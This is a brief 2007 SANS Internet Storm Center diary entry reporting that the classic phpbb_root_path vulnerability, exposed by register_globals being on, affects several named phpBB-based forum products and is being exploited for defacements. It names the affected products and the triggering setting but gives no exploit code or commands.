Threat Level: green Handler on Duty: Jan Kopriva

SANS ISC: Classic phpBB vulnerability impacts phpBB-based forums - SANS Internet Storm Center SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Classic phpBB vulnerability impacts phpBB-based forums
It seems fairly obvious but the classic phpbb_root_path vulnerability is present in products such as: Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB and Xero Portal.  All are affected by the vulnerability exposed by having register_globals set to "on."  It appears that it is being regularly exploited as well to deface systems.
Thanks for the lead Juergen!
Kevin Liston

292 Posts
ISC Handler
Feb 2nd 2007

Sign Up for Free or Log In to start participating in the conversation!